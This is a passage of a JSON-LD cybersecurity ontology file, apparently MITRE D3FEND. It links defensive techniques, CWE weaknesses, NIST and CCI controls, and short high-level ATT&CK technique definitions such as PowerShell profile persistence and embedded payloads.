      "d3f:kb-article": "## How it works\n\nRouting Access Mediation is a network security strategy focused on managing and controlling access at the network layer. It includes the use of VPNs for secure remote access, tunneling protocols for encapsulating data, firewall rules for filtering traffic, and advanced inspection techniques like Cisco's Context-Based Access Control (CBAC) to monitor and regulate data flow. This approach ensures secure and efficient routing of data across networks, protecting against unauthorized access and enhancing overall network security.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WhatIsNetworkAccessControl"
      },
      "rdfs:label": "Routing Access Mediation",
      "rdfs:seeAlso": {
        "@id": "https://www.geeksforgeeks.org/context-based-access-control-cbac/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkAccessMediation"
        },
        {
          "@id": "_:Nb8b6926d4a8341ca8052ed7e6c7b411a"
        }
      ]
    },
    {
      "@id": "_:Nb8b6926d4a8341ca8052ed7e6c7b411a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "d3f:PatentReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Patent",
      "rdfs:label": "Patent Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:CWE-1315",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1315",
      "d3f:definition": "The bus controller enables bits in the fabric end-point to allow responder devices to control transactions on the fabric.",
      "rdfs:label": "Improper Setting of Bus Controlling Capability in Fabric End-point",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CCI-003014_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces organization-defined mandatory access control policies over all subjects and objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-08-30T00:00:00"
      },
      "rdfs:label": "CCI-003014"
    },
    {
      "@id": "d3f:has-account",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-account y: The subject x has ownership or possession of some account y.",
      "rdfs:label": "has-account",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02209474-v"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:owns"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-008%3ACertutilExeCertificateExtraction_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-008/"
      },
      "d3f:kb-abstract": "This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-008: Certutil exe certificate extraction",
      "rdfs:label": "Reference - CAR-2021-05-008: Certutil exe certificate extraction - MITRE"
    },
    {
      "@id": "d3f:CWE-239",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-239",
      "d3f:definition": "The product does not properly handle when a particular element is not completely specified.",
      "rdfs:label": "Failure to Handle Incomplete Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-237"
      }
    },
    {
      "@id": "d3f:DHCPServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DHCPServiceApplication"
      },
      "d3f:definition": "A Dynamic Host Configuration Protocol (DHCP) server is a type of server that assigns IP addresses to computers.  DHCP servers are used to assign IP addresses to computers and other devices automatically.  The DHCP server is responsible for assigning the unique IP address to each device.",
      "d3f:manages": {
        "@id": "d3f:DHCPService"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Dynamic_Host_Configuration_Protocol"
      },
      "rdfs:label": "DHCP Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Server"
        },
        {
          "@id": "_:Naaf8df280eca4c43bd38884bde93cdc7"
        },
        {
          "@id": "_:N5aceb86a438942bcb175de128e26d03d"
        }
      ]
    },
    {
      "@id": "_:Naaf8df280eca4c43bd38884bde93cdc7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPServiceApplication"
      }
    },
    {
      "@id": "_:N5aceb86a438942bcb175de128e26d03d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPService"
      }
    },
    {
      "@id": "d3f:T1546.013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.013",
      "d3f:definition": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (<code>profile.ps1</code>) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.",
      "d3f:modifies": {
        "@id": "d3f:PowerShellProfileScript"
      },
      "rdfs:label": "PowerShell Profile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Na1bdc24ec0124703857f8f25d833379f"
        }
      ]
    },
    {
      "@id": "_:Na1bdc24ec0124703857f8f25d833379f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PowerShellProfileScript"
      }
    },
    {
      "@id": "d3f:CCI-000164_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit information from unauthorized deletion.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000164"
    },
    {
      "@id": "d3f:T1077",
      "@type": "owl:Class",
      "d3f:attack-id": "T1077",
      "d3f:definition": "Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include <code>C$</code>, <code>ADMIN$</code>, and <code>IPC$</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1021.002",
      "rdfs:label": "Windows Admin Shares",
      "rdfs:seeAlso": {
        "@id": "d3f:T1021.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:MemoryFreeFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Releases previously reserved memory associated with a process.",
      "d3f:invokes": {
        "@id": "d3f:FreeMemory"
      },
      "rdfs:label": "Memory Free Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N443d145d25524a969581c48eea5ca134"
        }
      ]
    },
    {
      "@id": "_:N443d145d25524a969581c48eea5ca134",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FreeMemory"
      }
    },
    {
      "@id": "d3f:T1622",
      "@type": "owl:Class",
      "d3f:attack-id": "T1622",
      "d3f:definition": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)",
      "rdfs:label": "Debugger Evasion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:DiscoveryTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1276",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1276",
      "d3f:definition": "Signals between a hardware IP and the parent system design are incorrectly connected causing security risks.",
      "rdfs:label": "Hardware Child Block Incorrectly Connected to Parent System",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_32",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Process Requirements for Information Transfer",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(32)"
    },
    {
      "@id": "d3f:M1056",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "d3f:DecoyObject"
        }
      ],
      "rdfs:label": "Pre-compromise"
    },
    {
      "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_CymmetriaInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170134423A1"
      },
      "d3f:kb-abstract": "A computer implemented method of detecting unauthorized access to a protected network by monitoring a dynamically updated deception environment, comprising launching, on one or more decoy endpoints, one or more decoy operating system (OS) managing one or more of a plurality of deception applications mapping a plurality of applications executed in a protected network, updating dynamically a usage indication for a plurality of deception data objects deployed in the protected network to emulate usage of the plurality of deception data objects for accessing the deception application(s) wherein the plurality of deception data objects are configured to trigger an interaction with the deception application(s) when used, detecting usage of data contained in the deception data object(s) by monitoring the interaction and identifying one or more potential unauthorized operations based on analysis of the detection.",
      "d3f:kb-author": "Dean Sysman; Gadi Evron; Imri Goldberg; Itamar Sher; Shmuel Ur",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Cymmetria Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DecoySessionToken"
        },
        {
          "@id": "d3f:DecoyUserCredential"
        }
      ],
      "d3f:kb-reference-title": "Decoy and deceptive data object technology",
      "rdfs:label": "Reference - Decoy and deceptive data object technology - Cymmetria Inc"
    },
    {
      "@id": "d3f:CWE-147",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-147",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as input terminators when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Input Terminators",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T1552",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Credential"
      },
      "d3f:attack-id": "T1552",
      "d3f:definition": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)),  or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)",
      "rdfs:label": "Unsecured Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N6ba1d38fb5e94586bad4d7e3460ac420"
        }
      ]
    },
    {
      "@id": "_:N6ba1d38fb5e94586bad4d7e3460ac420",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:RemoteFirmwareUpdateMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RemoteFirmwareUpdateMonitoring"
      ],
      "d3f:d3fend-id": "D3-RFUM",
      "d3f:definition": "Monitoring of remote firmware update commands to identify unauthorized software installations.",
      "d3f:detects": {
        "@id": "d3f:OTDeviceFirmwareCommand"
      },
      "d3f:kb-article": "## How it works\nBy deploying sensors within the OT environment to passively monitor network traffic, tools can leverage deep packet inspection to identify protocol-specific commands and generate logs of relevant firmware activity. Additionally, these tools may incorporate behavioral and signature-based analysis to enhance detection and alerting capabilities.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForDetectingAnomaliesInTimeSeriesDataProducedByDevicesOfAnInfrastructureInANetwork"
      },
      "d3f:monitors": {
        "@id": "d3f:OTNetworkTraffic"
      },
      "rdfs:label": "Remote Firmware Update Monitoring",
      "rdfs:seeAlso": {
        "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationProtocolCommandAnalysis"
        },
        {
          "@id": "_:Ncfcc2cfc70004b0f919e8492dd17b737"
        },
        {
          "@id": "_:N0a9da9f9b6ee4e71a2643a9774f00fd0"
        }
      ]
    },
    {
      "@id": "_:Ncfcc2cfc70004b0f919e8492dd17b737",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:detects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceFirmwareCommand"
      }
    },
    {
      "@id": "_:N0a9da9f9b6ee4e71a2643a9774f00fd0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Self-organizingMap",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SOM",
      "d3f:definition": "A Self-Organizing Map (SOM) is an unsupervised artificial neural network model that, during training (based on competitive learning), generates feature maps that are a two-dimensional discretized form of the input space.",
      "d3f:kb-article": "## References\nGeeksforGeeks. (n.d.). ANN - Self Organizing Neural Network (SONN). [Link](https://www.geeksforgeeks.org/ann-self-organizing-neural-network-sonn/)",
      "rdfs:label": "Self-organizing Map",
      "rdfs:subClassOf": {
        "@id": "d3f:ANN-basedClustering"
      }
    },
    {
      "@id": "d3f:may-be-tactically-associated-with",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-be-tactically-associated-with y: the defensive action x may be a tactic that counters offensive action y.",
      "rdfs:label": "may-be-tactically-associated-with",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:SessionDurationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SessionDurationAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "d3f:Authorization"
        }
      ],
      "d3f:d3fend-id": "D3-SDA",
      "d3f:definition": "Analyzing the duration of user sessions in order to detect unauthorized  activity.",
      "d3f:kb-article": "## How it works\nDetecting unauthorized user sessions by comparing the duration of a user logon session with a baseline behavior model. The behavior model comprises historical user session duration times.  Abnormalities between session duration and the behavior model may indicate suspicious activity.\n\n## Considerations\n* Potential for false positives from anomalies that are not associated with malicious activity.\n* Attackers may not differentiate their session duration enough to trigger an alert.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "Session Duration Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N6a5d6b4f0a01427c9a27f15dd2075bc3"
        },
        {
          "@id": "_:Nb427c0811e1e4eb3b325ada7cf473fba"
        }
      ]
    },
    {
      "@id": "_:N6a5d6b4f0a01427c9a27f15dd2075bc3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:Nb427c0811e1e4eb3b325ada7cf473fba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:T1027.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.009",
      "d3f:definition": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs)",
      "rdfs:label": "Embedded Payloads",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTSP800-53ControlCatalog"
      ],
      "d3f:archived-at": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-5/final"
      },
      "d3f:has-member": [
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-17_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-23"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-24"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-24_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-24_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_13"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_7"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_9"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_11"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_13"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_7"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_10"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_11"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_12"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_13"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_14"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_15"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_17"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_19"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_20"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_21"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_26"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_27"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_28"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_29"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_30"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_32"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_10"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_9"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-7"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-7_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-7_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-10_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-14_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-15"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-2_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-2_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-14"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-6_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IA-2_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IA-2_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IA-2_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IA-2_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IR-4_12"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IR-4_13"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-3_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-3_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-3_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-3_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-4_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-6_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-6_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-6_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-3_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-3_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_7"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-11_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-11_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-8_18"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-8_22"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SC-2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SC-2_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SC-3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SC-3_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-2_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-2_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-2_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-3_10"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-3_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-3_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-4_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-4_4"
        }
      ],
      "d3f:version": 5,
      "rdfs:label": "NIST SP 800-53 R5",
      "rdfs:seeAlso": {
        "@id": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-5/final"
      }
    },
    {
      "@id": "d3f:TA0104",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Execution - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Execution"
    },
    {
      "@id": "d3f:CWE-908",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-908",
      "d3f:definition": "The product uses or accesses a resource that has not been initialized.",
      "rdfs:label": "Use of Uninitialized Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-665"
      }
    },
    {
      "@id": "d3f:CWE-652",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-652",
      "d3f:definition": "The product uses external input to dynamically construct an XQuery expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.",
      "rdfs:label": "Improper Neutralization of Data within XQuery Expressions ('XQuery Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-91"
        },
        {
          "@id": "d3f:CWE-943"
        }
      ]
    },
    {
      "@id": "d3f:DS0007",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment",
      "d3f:exactly": {
        "@id": "d3f:VMImage"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Image Metadata component",
      "rdfs:label": "Image (ATT&CK DS)"
    },
    {
      "@id": "d3f:PhiCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PC",
      "d3f:definition": "The phi coefficient (or mean square contingency coefficient) is a measure of association for two binary variables.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Phi coefficient. [Link](https://en.wikipedia.org/wiki/Phi_coefficient)",
      "d3f:synonym": [
        "MCC",
        "Matthews Correlation Coefficient (in machine learning)"
      ],
      "rdfs:label": "Phi Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "d3f:CloudUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user account on a given host is a local user account for a given cloud and specified resources within that cloud.",
      "rdfs:label": "Cloud User Account",
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CWE-733",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-733",
      "d3f:definition": "The developer builds a security-critical protection mechanism into the software, but the compiler optimizes the program such that the mechanism is removed or modified.",
      "rdfs:label": "Compiler Optimization Removal or Modification of Security-critical Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1038"
      }
    },
    {
      "@id": "d3f:transmits",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x transmits y: The subject x actively emits object y onto a communication medium, rendering y observable and available for reception on that medium.",
      "rdfs:label": "transmits",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": "sends"
    },
    {
      "@id": "d3f:CWE-1293",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1293",
      "d3f:definition": "The product relies on one source of data, preventing the ability to detect if an adversary has compromised a data source.",
      "rdfs:label": "Missing Source Correlation of Multiple Independent Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:T1502",
